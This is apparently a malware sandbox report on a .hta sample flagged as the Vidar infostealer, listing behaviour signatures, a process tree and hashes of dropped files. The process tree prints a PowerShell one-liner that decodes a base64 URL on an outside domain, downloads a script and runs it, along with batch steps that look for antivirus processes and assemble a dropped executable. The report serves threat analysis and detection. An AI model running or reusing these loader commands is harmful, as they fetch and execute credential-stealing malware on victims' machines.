Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
34s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
23/12/2024, 12:31
General
-
Target
.hta
-
Size
722B
-
MD5
4f2067f591d1db46908f42c461b43bc8
-
SHA1
dbb6c2be0345648645105f5f8646662e319a01ba
-
SHA256
edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84
-
SHA512
5fde4eea4445de8ac73e510c43475b025d12d8f4e9c71e230d7b99a49efc8c6fa381bcda09295c26afb294bd67cf0a63c20f538dd3b66b702ca9f1ac75bf1c9a
Malware Config
Extracted
https://polovoiinspektor.shop/secure/login.txt
Signatures
-
Detect Vidar Stealer 4 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5403old4\5403old4.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC822.tmp" "c:\Users\Admin\AppData\Local\Temp\5403old4\CSC81C1814B35C045928742ACCF2BCA34F1.TMP"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\smeyrjhs.1ev.exe"C:\Users\Admin\AppData\Local\Temp\smeyrjhs.1ev.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Camcorders Camcorders.cmd & Camcorders.cmd4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1217595⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Including5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Contracts" Food5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dial + ..\Reaction + ..\Rw + ..\More C5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.comConditioning.com C5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com" & rd /s /q "C:\ProgramData\YU3ECBI5FCBA" & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
281KB
MD53bf50099b20498ddd1ba273763a8bf2a
SHA166fb6dc9fd5c6a1945868aa57d4d85b7747de5fc
SHA256eafa6fb1e47f7ac7763d334901adf18ec11305767ef65aadb9a4b97ff322c818
SHA5123485a4dddb598629ae5d3ed91ae8b165725c434b09a31db30cecca337e98527ad5570283e97180996b1f71d11d997fb93a36a2e09cac68680054cc2e23f125dc
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
3KB
MD5eda293cb8ccff7c28476f7ce9c78d512
SHA1fc428c85d1a08b61aa49140dc83e3332a37837fe
SHA256ef368241f3c1c5b4ffa04deac6fd5354ad5d823286b7ad8b366ae7278c508984
SHA5125ae945e3d60e6385c27de3b8a187fa59b73f6d986df00c48552f0de40a17a9f7b8c079bf4ba7eaf3acbfdae4fd1f040c94e625502144f7e5df5e00d92b1576f4
-
Filesize
89KB
MD5423e53801596a3754f3381b00520324d
SHA1af7edcc9397fb76ecf2565069d6a8a463aaad356
SHA2565e239df69afe95bf5f6b7f2c73734f5077f0e81e68d335d1afc8a02095a08d44
SHA512d03b2661b36575b2b7bf0973e9c7d7aef5e2bbd9cd2d5c79d387235de6705c9fc525cb4887754b7a2cde3bc6d712c51b0d400016e570ae9ccf893d8342ac6db2
-
Filesize
52KB
MD5beca63186b42e3bd6e4fa41c8267cafb
SHA12752ce8c9f0e4147258ad7ee353e1cb7e1f21d2a
SHA25622cabd142ba36370e14bc6e12be12447a0b6e076f5d0321af3aa03cf90535ddb
SHA5121d30809c114a2ea2d09110f1b375fbe4e571a48bc7e0a999d6ea7f65db13050275beb3468a2ecdca7fbdfaf98702c679abb5d6f5b4b0ec694b20e5cc86a9870f
-
Filesize
32KB
MD53301e26e06a9bdd9a1bc170c69e81c42
SHA1b37eee171583d38339d47ad58245a3e1995b6773
SHA25672d32e2ee62983f9a970a2c3fba99ffd16a568ecbdce30414137bccb357ddb8d
SHA512e2f396a7ea35303ca30c508360c5308f7caad4d4b0e531a8abc7d5af9c91540c3ccbd7aeffad4d16f8195789c41a882031c025e2f8040718a0fdfa4ec6a456d2
-
Filesize
70KB
MD586535bd717538f76a712051215acffe0
SHA1a35d175c770619532670489e220f7aea33e31b82
SHA256ec71593a937b600a439fedd5c08443dd33f3fff54db79cb4c2fe1e8b115304a4
SHA51205a6ede5dac033a468c19c665c8deb2ae07127548c43d1036b147ef97a660b61c91f9dcf6e11d7583fcdae9c6e1f86f91e7f6b3121be62970f1e54a158a69ec4
-
Filesize
116KB
MD51e9912d485a7aa78f66dcc4600767d05
SHA18a54fd29685f4459f560e45614fd3247d372faeb
SHA2560883bac437e48a02304fcb60f479cdddf341897f6efbff702fc97e2c62f4629b
SHA512b3fe37cbf93dcd863a594723acb26c65779c194f292262fdc5c8d869a6e77a8d041e243fbb9e982deda8db23e0872f58659269d831ccc522a76eb06e08130f4e
-
Filesize
94KB
MD56c35273608049b0a414a70922432ed56
SHA1535a9553219e4e5eda492fbcdcff3ad0dc30c014
SHA256897467d02361d67ae47453019aa1a707bdb05fe4895ff2eb0f648117e4c9a9e0
SHA512ed6bc781547695d02ac5cedff311e00cc103b9d8df9012f09ccaa2a658b388519eb49995ef67db46d2e254d90756aeba76084faa9780e534ea5bf790d20bf897
-
Filesize
75KB
MD5dd30b08b16b5673809ddcf69c9520716
SHA19bdce7a52d0ae11d3a4cb0554d468f1aee7952df
SHA256f9e21ab38541c29b29640d6065ebdb3e465c9b5c42b2c8d88930531e7ea592de
SHA512e351ca9aeda50efef57b8a497554be6a6ae2485ee06183794d5d07129dbfba2bffff64bd8563bc7994b07be2da5e4f09b55599a68b45b433875af32606d1948b
-
Filesize
495B
MD5ae9aa8b1fc2a881cc5e432fa722a123b
SHA1a72d7db7e2383bd7af65889a7480da31338a0610
SHA256970b6f2d200dfc9fa8abb9acda01adda008aef5f3056e6f9017e3582e705b229
SHA512b7ce3d36d9a5227ec1319b5b689b01e07b18f7b9cddedd114f08cac8ee15a200f007239d31a55da4bf132591a4bd18e853bb1fdd99ad35ed42532f4de64745d6
-
Filesize
477KB
MD5c91a63810cd590f88f57d0f011fff7cb
SHA11f496c923982dfd63a4621ed600aa9a1981e61ce
SHA2565beee0043fd30a3838851d29eec944b6c35675a16b8b38ddea0feab9aba40372
SHA5126135a350df50eb367b4a391ff3a819ada11dbcdc58b29eba5877da7b0bfdf4dd5f0ccf46e3b52e5b0a8e20212b02db908fed0db51d435c7af2f16571abb1d322
-
Filesize
82KB
MD532ba40029fb16a3b6501993ae7d4d6e2
SHA18a242625cfdadbb6fb87869531d74d5b3c226e6c
SHA2566b1203b0aa2d77c068474cfca065e673f63128d0d4bf680a9bce73aee8ffa70a
SHA5125c54f37773e6f965fbbf1ac4b8d294be424df389ffe195e818d99155f268775f4cf65081655d1ff119a707e5cd0a1cf47381ffbf4f51dc1c34adc0e4b0438253
-
Filesize
34KB
MD5ace4babbbfab6829c0c5f29b089eb222
SHA113bec11deab5552f45c2ed84f216254f04987eeb
SHA256074c318d048f05403861b195b3099950c528ac93edf9cae4a8a7a223ee3e771c
SHA512a7af2994ef5f1a39d2a5e42f40aa27cf19aeeb0373468e1ada58ccf75dc186fb5680ff573b8465eec010c5ee4121008f0b67fb4c2795b442c3ddb6316b8b3589
-
Filesize
1KB
MD529b6258a497c1b0070400cf1dd7739e9
SHA11c7dabeb5336dc427876f165258f3002e00a37c3
SHA2566cdea0b5b1c24f9a7fccc95c590a89d819cb09ffa0d8f8ae7f93a50dde50eeb3
SHA5126611cbeda4daad5c69996e0c4eb7c955536f624851311abdeeef004380de01156b158172975a68398c045462697bbb17d7094ab7e216836885f6cc1193d643ce
-
Filesize
99KB
MD59e60f847c8905bcea5fce1b404be787d
SHA1ccbfa12fa6521de81d135972a4fb5877f6f9876f
SHA25655fe0fce17316361a5d721db3817f49a12a468c078cf219135c2ec82a917ba9c
SHA5127d459081bc497f68a46585baff5dbf8ec9d3be5ef706637a0d6b23ae3394c2d9c0ddf46ff938f8527defa66ce248b9913c39d7ff15b95e11ea50309210f274cd
-
Filesize
54KB
MD53109da05a51e0346c944cc4d5ec69a2d
SHA1c9a6c71f0d89fba62b1b4fe071e71118977cfdb1
SHA2564f654a19fd72c48fe60976adc1f0e8836bdca05469b33c5bd879ff012b69d63f
SHA51249970654f295014a3f4c2d26b329dc4ac1db8ad1fbae58d571e3d01d5236d9d005b86e0a84d00b22500355c98e494f052cf8f31ecc973acdfcea159ff615035a
-
Filesize
62KB
MD57d9756691edb69e4770b28e179021e47
SHA13768e4f6f121cc06fc8e160c6393829ff92ea5f0
SHA256bebf4c78e85da0bff29917f1be0e72abe0a90f049d930009eae626477b15a1d4
SHA5126b5b102c65416843a7c1d726e753459cd00c868ca90bf15ccba4894ba8468f30aaa5ab477afdb88b3c89c865915fc367ec28c93d9308ed2d19fdbfd1fa08a534
-
Filesize
53KB
MD5965e96449ed6f450d230bae35f692d88
SHA15455c2def234a19429c00c1f89204122ec7d647b
SHA2565350a8e80a7319e726181b27e6de22369440dd886a03bb69789458ec4f917528
SHA51238ddfa73d757b8076aa903d0d1928c9ab75eed20df4e3965bf900d47522638c15059cc888e61890526a1eeb2449dd358e160edfe4e7d476b8cbec502b9de2375
-
Filesize
84KB
MD5e1d3296e1a37e1aa1ab6ffec411ad6bb
SHA1d9dfa685019a310206ea86a5c17770d4715ed0c3
SHA256cd653b7b6a15148b0a0a93c796549c6ef4ac6b419fe3934a202589a5e6a20402
SHA5124b49900f88146719010aae4024770e81116a88002dcaf39fb2a403fa3919a6825c80cb36a73f524851ab3d789802daee207aaa5e86027642c9f09b4be72264ad
-
Filesize
116KB
MD52517b87efca5f3bc96f8675597c8bf3a
SHA177166db5b13351515a6aff43becd1852508bab9e
SHA256e1e488a0bbdeb95b8e2a56940080f6cb42a1b24198a469f2293476324243b4f9
SHA512ed6d6ff08834e1401ec8a9eaf53626b93f38b87e1fa61e4dc31f754cadf44fcc26479d534ab95c235b593bdb597fac108a3501cf4e395c719071339305d82916
-
Filesize
125KB
MD5b31da340190873e96f12aefc7ceafef8
SHA1244b0c459250ada1cae6b3604bb2508a6a9e0520
SHA256d7c247d414377f6f80bd8e5dbb7d33a39326e82114344a0c7cd37799e48f0a41
SHA512ed460c190ddef61c97a5490830042d7b35cc695a61ac79121c1e8e8397e9d773366f11086000e633a98f7126f3a97ce8b2be86801540659715b3c5ca24f6d523
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD59908fef6dfd69de72ffa10ae467c2502
SHA1173888707b098b976976cd1ed0f3e57905de4d4b
SHA25631619be786bd17a126d0962c80871e93ea9263880cd98fad5a8aa450525e24d6
SHA5122eab6699e11a3fe7ea2956dc2ff1221b001f67ee4fd08eb7140fd6dfabbeb351b61680374cc46f2f8bb07abf5d945554f84ba0dded166eb572666397ba3fdaf9
-
Filesize
648B
MD58539b6708ddc98df3a1cd74954dc89bd
SHA1a69c850c26e8ecd62a3dc997164d4c92617fa40d
SHA2560b0d3909c6bdbccc83f6206dd9e50cb8fcfa9cbdc250ac5d926cd0f8698adc3d
SHA512c7d9a203876b75dba73305732026b0d0c6bc699870731a8a67066c1ec068cc6b05a5b3ab64384005f1dcf81fd0a5d5713a30885a56016126258db76d9a2f5afa
-
Filesize
369B
MD51d7d1b1e7e4b0d980dc7df73ac8617c4
SHA1ccb9c29f3f7ae496588919b08c3b74a19701b145
SHA256288e98e428c9c5465202c5873600933f1c96b94d84ba549f994a463ad2cc73a3
SHA5121b126074d7b566f072dab2375f58b507cc5857a32df49295d0dee7b8983bdb9a47b1b384f5d35022ebce403bb38512053d60d4f06f5087866b55cd5ba7d6fbad
-
Filesize
652B
MD546314dfdd61f8d34ccf15a1f11b1e2a8
SHA16961a31e2b72bf9471bdf8b455520d3eac97c2d1
SHA2567dfe4c822a220830a532eb4229161d9b9dc054787a45405a48f3b846c1c14750
SHA51250c2af3381f6ab90ec085c71e3a8cc830710621af7c02d2b31106177640143c2f33c6b8dc24b34e09ceddea833fc105ca6cd726e5b3199f2027f56e13077df47
-
Filesize
4KB
-
Filesize
6.2MB
-
Filesize
6.5MB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
5.2MB
-
Filesize
408KB
-
Filesize
32KB
-
Filesize
3.3MB
-
Filesize
1.8MB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB